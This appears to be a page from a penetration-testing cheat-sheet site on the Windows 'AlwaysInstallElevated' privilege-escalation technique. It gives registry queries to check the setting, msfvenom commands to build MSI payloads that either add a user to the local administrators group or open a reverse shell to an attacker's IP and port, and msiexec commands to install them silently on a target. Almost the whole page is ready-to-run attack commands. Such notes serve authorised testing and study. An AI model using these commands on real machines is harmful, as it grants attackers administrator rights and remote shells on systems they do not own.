Hack$Notes
Search…
Always Install Elevated
Always Install Elevated

Check with:

1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
From the output, notice that "AlwaysInstallElevated" value is 1. This needs to be on both to be exploited.

Steps:

1
# Generate payload to add user to admin group
2
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
3
4
OR
5
6
# Create a reverse shell
7
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi
8
9
# Run it on the target machine:
10
msiexec /quiet /qn /i setup.msi
11
msiexec /quiet /qn /i reverse.msi <--- Needs a netcat listener
Copied!
Copy link